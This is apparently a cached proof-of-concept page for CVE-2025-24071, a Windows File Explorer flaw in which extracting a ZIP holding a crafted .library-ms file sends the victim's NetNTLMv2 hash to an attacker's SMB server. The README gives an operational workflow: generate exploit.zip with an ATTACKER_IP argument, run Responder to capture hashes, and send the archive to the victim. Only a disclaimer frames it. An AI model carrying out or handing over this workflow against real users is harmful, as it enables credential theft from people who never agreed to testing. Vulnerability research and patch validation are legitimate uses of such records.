PoC details: a859d556d51a34d116d1a0c98499ddf7a2e9d201

Source
Related vulnerability
Title: Microsoft Windows File Explorer information disclosure vulnerability (CVE-2025-24071)
Description: Microsoft Windows File Explorer is a file manager application from the US company Microsoft. Microsoft Windows File Explorer contains an information disclosure vulnerability. An attacker who exploits it can obtain sensitive information. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows Server 2019, Windows Server
Introduction
# CVE-2025-24071

This Python script is designed to demonstrate the **CVE-2025-24071** vulnerability in Windows Explorer. The vulnerability allows an attacker to capture a victim's **NetNTLMv2** credentials without the victim opening any file: extracting the archive is enough to trigger the leak.

## Description

The **CVE-2025-24071** vulnerability exists in the way Windows handles `.library-ms` files inside ZIP archives. When a ZIP file containing a malicious `.library-ms` file is extracted, Windows automatically attempts to access the SMB location specified in the file, which can expose the victim's credentials to the server at that location.

This script generates a ZIP file containing such a `.library-ms` file. When a victim extracts the ZIP file, the system automatically tries to connect to the SMB location named in the file, sending **NetNTLMv2** credentials to the attacker's listener without any further action by the victim.

## How It Works

1. The script takes the **attacker's IP address** as an argument and inserts it into an XML file that defines a `.library-ms` file. This file instructs Windows to connect to a shared resource at the attacker's IP address.

2. The `.library-ms` file is then placed inside a ZIP file named `exploit.zip`.

3. When the victim extracts the ZIP file, Windows processes the `.library-ms` file and, due to the vulnerability, automatically establishes an SMB connection to the attacker's server.

4. The attacker can capture the **NetNTLMv2** credentials using a tool such as **Responder**, without the victim needing to take any further action.

## Requirements

- Python 3.x
- Modules: `zipfile`, `os`, `argparse` (all part of the Python standard library)

## Usage

1. **Generate the malicious file**:

```bash
python exploit.py --ip <ATTACKER_IP>
```

2. Once the malicious file is generated, ensure that Responder is running and listening for the **NetNTLMv2** hashes.

```bash
responder -I <INTERFACE>
```

3. Send the generated `exploit.zip` file to the victim. When they extract the file, Windows will attempt to connect to the SMB server specified in the `.library-ms` file.

4. Once the victim extracts the ZIP file and Windows attempts the SMB connection, **Responder** will capture the **NetNTLMv2** hashes from the victim.

## Disclaimer

This script is intended for educational and testing purposes in controlled environments. The malicious use of this vulnerability may be illegal and against the laws and regulations of many countries. Use this script only on systems that you have permission to audit and always with proper authorization.
File snapshot

```text
[4.0K] /data/pocs/a859d556d51a34d116d1a0c98499ddf7a2e9d201
├── [ 947] poc.py
└── [2.5K] README.md

0 directories, 2 files
```

Shenlong bot has cached this for you.
Notes
    1. It is recommended to access the PoC through the original source first.
    2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com (replace # with @) to request the local snapshot.
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.